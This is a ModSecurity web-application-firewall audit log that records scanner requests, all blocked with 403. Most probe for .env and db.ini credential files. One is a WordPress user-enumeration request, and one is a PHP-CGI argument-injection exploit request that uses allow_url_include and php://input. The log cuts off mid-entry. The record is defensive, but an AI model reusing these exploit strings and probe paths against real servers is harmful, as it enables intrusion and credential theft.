charset=iso-8859-1 --e6a86b25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745853029626536 647 (- - -) Stopwatch2: 1745853029626536 647; combined=273, p1=245, p2=0, p3=0, p4=0, p5=27, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6a86b25-Z-- --77f64967-A-- [28/Apr/2025:22:23:15 +0700] aA-dY8JruAEpaSEZ7DBM_wAAAAE 103.236.140.4 36978 103.236.140.4 8181 --77f64967-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.42 Safari/537.36 Accept-Charset: utf-8 --77f64967-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77f64967-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745853795865914 809 (- - -) Stopwatch2: 1745853795865914 809; combined=318, p1=277, p2=0, p3=0, p4=0, p5=41, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77f64967-Z-- --4386f56c-A-- [28/Apr/2025:22:23:28 +0700] aA-dcI_5LpLtj_OTfS9fSAAAANI 103.236.140.4 37524 103.236.140.4 8181 --4386f56c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; CrOS x86_64 12239.67.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.102 Safari/537.36 Accept-Charset: utf-8 --4386f56c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4386f56c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745853808090624 625 (- - -) Stopwatch2: 1745853808090624 625; combined=260, p1=224, p2=0, p3=0, p4=0, p5=36, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4386f56c-Z-- --81545d19-A-- [28/Apr/2025:23:15:35 +0700] aA-pp8JruAEpaSEZ7DBTagAAAAo 103.236.140.4 35590 103.236.140.4 8181 --81545d19-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; HMA-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --81545d19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81545d19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745856935019683 886 (- - -) Stopwatch2: 1745856935019683 886; combined=418, p1=309, p2=0, p3=0, p4=0, p5=109, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81545d19-Z-- --822a3520-A-- [28/Apr/2025:23:34:07 +0700] aA-t_4_5LpLtj_OTfS9nswAAAMg 103.236.140.4 40212 103.236.140.4 8181 --822a3520-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 172.94.10.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 172.94.10.14 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --822a3520-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --822a3520-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745858047909378 2921 (- - -) Stopwatch2: 1745858047909378 2921; combined=1353, p1=462, p2=862, p3=0, p4=0, p5=29, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --822a3520-Z-- --058b232d-A-- [28/Apr/2025:23:57:51 +0700] aA-zj1T4soy9XydcuKYm8AAAAEs 103.236.140.4 45990 103.236.140.4 8181 --058b232d-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --058b232d-C-- --058b232d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --058b232d-E-- --058b232d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745859471431128 3814 (- - -) Stopwatch2: 1745859471431128 3814; combined=2492, p1=446, p2=2015, p3=0, p4=0, p5=30, sr=70, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --058b232d-Z-- --24e7f335-A-- [29/Apr/2025:00:18:29 +0700] aA-4ZWj1i6BJZll4jGM7pAAAAIs 103.236.140.4 51056 103.236.140.4 8181 --24e7f335-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Googlebot-Video/1.0 Accept-Charset: utf-8 --24e7f335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24e7f335-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745860709892541 821 (- - -) Stopwatch2: 1745860709892541 821; combined=318, p1=262, p2=0, p3=0, p4=0, p5=55, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24e7f335-Z-- --75639e31-A-- [29/Apr/2025:00:18:50 +0700] aA-4emj1i6BJZll4jGM7sQAAAIo 103.236.140.4 51146 103.236.140.4 8181 --75639e31-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3803.0 Safari/537.36 Edg/76.0.174.0 Accept-Charset: utf-8 --75639e31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75639e31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745860730046585 756 (- - -) Stopwatch2: 1745860730046585 756; combined=299, p1=263, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75639e31-Z-- --d4b67a1e-A-- [29/Apr/2025:00:32:02 +0700] aA-7ko_5LpLtj_OTfS9rPAAAAME 103.236.140.4 54326 103.236.140.4 8181 --d4b67a1e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; GT-P5210 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Accept-Charset: utf-8 --d4b67a1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4b67a1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745861522897924 817 (- - -) Stopwatch2: 1745861522897924 817; combined=339, p1=304, p2=0, p3=0, p4=0, p5=35, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4b67a1e-Z-- --a5826563-A-- [29/Apr/2025:00:32:11 +0700] aA-7m8JruAEpaSEZ7DBYjgAAAAs 103.236.140.4 54360 103.236.140.4 8181 --a5826563-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14 Accept-Charset: utf-8 --a5826563-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5826563-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745861531331609 758 (- - -) Stopwatch2: 1745861531331609 758; combined=300, p1=263, p2=0, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5826563-Z-- --43cc986c-A-- [29/Apr/2025:01:37:12 +0700] aA_K2Gj1i6BJZll4jGNSCwAAAIU 103.236.140.4 39778 103.236.140.4 8181 --43cc986c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 194.163.159.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; GM1910) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --43cc986c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43cc986c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745865432239578 733 (- - -) Stopwatch2: 1745865432239578 733; combined=296, p1=263, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43cc986c-Z-- --18dedc51-A-- [29/Apr/2025:01:37:30 +0700] aA_K6lT4soy9XydcuKY_pAAAAEw 103.236.140.4 40440 103.236.140.4 8181 --18dedc51-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 194.163.159.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Accept-Charset: utf-8 --18dedc51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18dedc51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745865450682280 948 (- - -) Stopwatch2: 1745865450682280 948; combined=440, p1=392, p2=0, p3=0, p4=0, p5=48, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18dedc51-Z-- --f8d20645-A-- [29/Apr/2025:01:46:39 +0700] aA_ND1T4soy9XydcuKZD7QAAAFY 103.236.140.4 59652 103.236.140.4 8181 --f8d20645-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1 Accept-Charset: utf-8 --f8d20645-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8d20645-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745865999133168 762 (- - -) Stopwatch2: 1745865999133168 762; combined=335, p1=300, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8d20645-Z-- --67f14c1a-A-- [29/Apr/2025:03:41:52 +0700] aA_oEI_5LpLtj_OTfS-l8wAAAMI 103.236.140.4 41708 103.236.140.4 8181 --67f14c1a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --67f14c1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67f14c1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745872912730168 820 (- - -) Stopwatch2: 1745872912730168 820; combined=368, p1=327, p2=0, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67f14c1a-Z-- --0b076c6a-A-- [29/Apr/2025:03:49:41 +0700] aA_p5QW3ctMdWeqW3LOhJAAAAFA 103.236.140.4 47816 103.236.140.4 8181 --0b076c6a-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0b076c6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b076c6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873381523784 1299 (- - -) Stopwatch2: 1745873381523784 1299; combined=568, p1=528, p2=0, p3=0, p4=0, p5=40, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b076c6a-Z-- --f0ad395d-A-- [29/Apr/2025:03:49:41 +0700] aA_p5cDCAfZpkPvVAPOdBQAAAI0 103.236.140.4 47818 103.236.140.4 8181 --f0ad395d-B-- GET /config/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f0ad395d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0ad395d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873381726131 876 (- - -) Stopwatch2: 1745873381726131 876; combined=380, p1=343, p2=0, p3=0, p4=0, p5=36, sr=132, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0ad395d-Z-- --3c3dff24-A-- [29/Apr/2025:03:49:41 +0700] aA_p5cDCAfZpkPvVAPOdBgAAAI4 103.236.140.4 47820 103.236.140.4 8181 --3c3dff24-B-- GET /.env.production HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --3c3dff24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c3dff24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873381935543 673 (- - -) Stopwatch2: 1745873381935543 673; combined=290, p1=259, p2=0, p3=0, p4=0, p5=31, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c3dff24-Z-- --f764235b-A-- [29/Apr/2025:03:49:42 +0700] aA_p5sDCAfZpkPvVAPOdCAAAAJM 103.236.140.4 47826 103.236.140.4 8181 --f764235b-B-- GET /api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f764235b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f764235b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873382137830 824 (- - -) Stopwatch2: 1745873382137830 824; combined=355, p1=321, p2=0, p3=0, p4=0, p5=34, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f764235b-Z-- --421af865-A-- [29/Apr/2025:03:49:42 +0700] aA_p5sDCAfZpkPvVAPOdCQAAAJA 103.236.140.4 47828 103.236.140.4 8181 --421af865-B-- GET /settings/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --421af865-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --421af865-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873382345477 681 (- - -) Stopwatch2: 1745873382345477 681; combined=300, p1=269, p2=0, p3=0, p4=0, p5=31, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --421af865-Z-- --39929a3e-A-- [29/Apr/2025:03:49:44 +0700] aA_p6MDCAfZpkPvVAPOdEQAAAII 103.236.140.4 47848 103.236.140.4 8181 --39929a3e-B-- GET /db.ini HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --39929a3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39929a3e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against 